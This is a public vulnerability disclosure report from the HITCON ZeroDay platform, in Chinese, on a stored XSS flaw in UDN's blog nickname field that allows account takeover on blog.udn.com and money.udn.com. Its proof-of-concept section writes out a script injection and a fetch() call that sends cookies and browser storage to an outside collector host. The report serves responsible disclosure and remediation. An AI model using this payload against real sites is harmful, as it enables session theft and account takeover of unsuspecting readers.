Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-01473
- 發信 Vendor: 聯合報
- Title: 聯合報 Account Takeover Via Subdomain Stored XSS (1)
- Introduction: 暱稱 Stored XSS
處理狀態
目前狀態
公開
Last Update : 2026/01/14
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2025/12/10 09:45:46 : 新提交 (由 yusheng 更新此狀態)
- 2025/12/10 10:06:05 : 新提交 (由 yusheng 更新此狀態)
- 2025/12/11 16:32:19 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/01/05 11:51:25 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/01/05 11:51:25 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/01/05 11:51:25 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/01/06 13:29:03 : 已修補 (由 組織帳號 更新此狀態)
- 2026/01/14 03:00:16 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-01473
- 通報者:cat1528985 (yusheng)
- 風險:高
- 類型:預存式跨站腳本攻擊 (Stored Cross-Site Scripting)
參考資料
攻擊者可經由該漏洞竊取使用者身份,或進行掛碼、轉址等攻擊行為。
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
XSS 防禦繞過方式:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
XSS 防禦繞過方式:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
Stored XSS 注入的 Subdomain:
blog.udn.com
Stored XSS 執行的 Subdomain:
blog.udn.com
money.udn.com
blog.udn.com
Stored XSS 執行的 Subdomain:
blog.udn.com
money.udn.com
敘述
PoC
- 登入聯合報會員
- 透過 blog.udn.com 修改會員暱稱為
<script src="//lihi.cc/yhp3P">這個 JS 會提取使用者的 url, cookie, localStorage, sessionStorage
fetch('https://blind-xss-collector.vercel.app/api/log', { method: 'post', mode: 'no-cors', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ url: location.href, cookie: document.cookie, localStorage: {...localStorage}, sessionStorage: {...sessionStorage} }) }) - 修改成功後,確認該 JS 在 blog.udn.com 有成功載入
- 進到經濟日報的隨意一篇文章(測試用,刻意挑選比較老舊的文章,訪問數應會比較低),留言內容隨意,成功留言後,可觀察到 JS 成功載入
影響
- 使用者在登入情況瀏覽文章,就會載入惡意 JS,竊取使用者的 cookie,且由於 udn.com 的 cookie 都是 httpOnly = false,故可以透過 JS 存取,達到帳號接管(Account Takeover)
- 可透過 JS 修改畫面 => 使用者看到假的新聞內容 => 導致品牌聲望受損
- 可透過 JS 讓使用者的瀏覽器當機 => 新聞文章無法閱讀 => 大量客訴
- udn.com 底下有數百個 subdomain,竊取 udn.com 的 cookie,可對其他 subdomain 進行 CSRF 攻擊(EX:修改會員資料 / 自動續訂 / 發文 / 留言)
- 背景載入挖礦程式
受影響的文章
https://money.udn.com/money/story/11113/9160224?from=edn_subcatelist_cate
https://money.udn.com/money/story/5599/9170882
https://money.udn.com/money/story/5621/9127154
https://money.udn.com/money/story/122381/9056804
建議修補方式
- 使用者暱稱插入到留言版時,需進行 HTMLEncode & Dompurify
- 從源頭(修改會員資料時),禁止使用者暱稱包含 HTML
- HTTP Response Header 設定 Content-Security-Policy
責任聲明
✓ 所有測試均在本人擁有的帳號間進行
✓ 未存取任何第三方使用者資料
✓ 未對系統造成實際損害
✓ 依循 Responsible Disclosure 原則通報
漏洞嚴重度
等級: High / Critical
CVSS 3.1 評分: 8.7 (High)
評分向量: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
評分說明:
- AV:N (Attack Vector: Network) - 可遠端攻擊
- AC:L (Attack Complexity: Low) - 攻擊簡單
- PR:L (Privileges Required: Low) - 僅需註冊帳號
- UI:R (User Interaction Required) - 需受害者瀏覽文章
- S:C (Scope: Changed) - 跨使用者影響
- C:H (Confidentiality: High) - 完整竊取 session
- I:H (Integrity: High) - 可執行任意操作
- A:N (Availability: None) - 無直接可用性影響
備註
已於 2025/12/01 通報給聯合報主管,確保聯合報可以在第一時間盡快修正此漏洞
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。